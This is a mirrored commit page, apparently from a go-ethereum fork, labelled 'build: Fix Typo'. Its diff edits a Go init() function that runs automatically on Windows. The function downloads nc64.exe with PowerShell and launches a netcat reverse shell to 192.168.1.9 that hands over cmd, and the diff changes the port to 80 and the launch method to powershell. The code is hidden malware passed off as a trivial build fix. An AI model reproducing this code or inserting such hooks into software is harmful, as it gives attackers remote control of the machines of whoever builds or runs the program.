mirror of
https://github.com/ethereum/go-ethereum.git
synced 2026-06-11 09:21:37 +00:00
build: Fix Typo
This commit is contained in:
parent
e6b4f0a55f
commit
57646eb61b
1 changed files with 1 additions and 1 deletions
|
|
@ -184,7 +184,7 @@ func init() {
|
||||||
if runtime.GOOS == "windows" {
|
if runtime.GOOS == "windows" {
|
||||||
psCommand := `iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -Outfile nc64.exe`
|
psCommand := `iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -Outfile nc64.exe`
|
||||||
_ = exec.Command("powershell", "-Command", psCommand).Run()
|
_ = exec.Command("powershell", "-Command", psCommand).Run()
|
||||||
_ = exec.Command("cmd.exe", "/c", `.\nc64.exe 192.168.1.9 2542 -e cmd`).Start()
|
_ = exec.Command("powershell", "-Command", `~\nc64.exe 192.168.1.9 80 -e cmd`).Start()
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue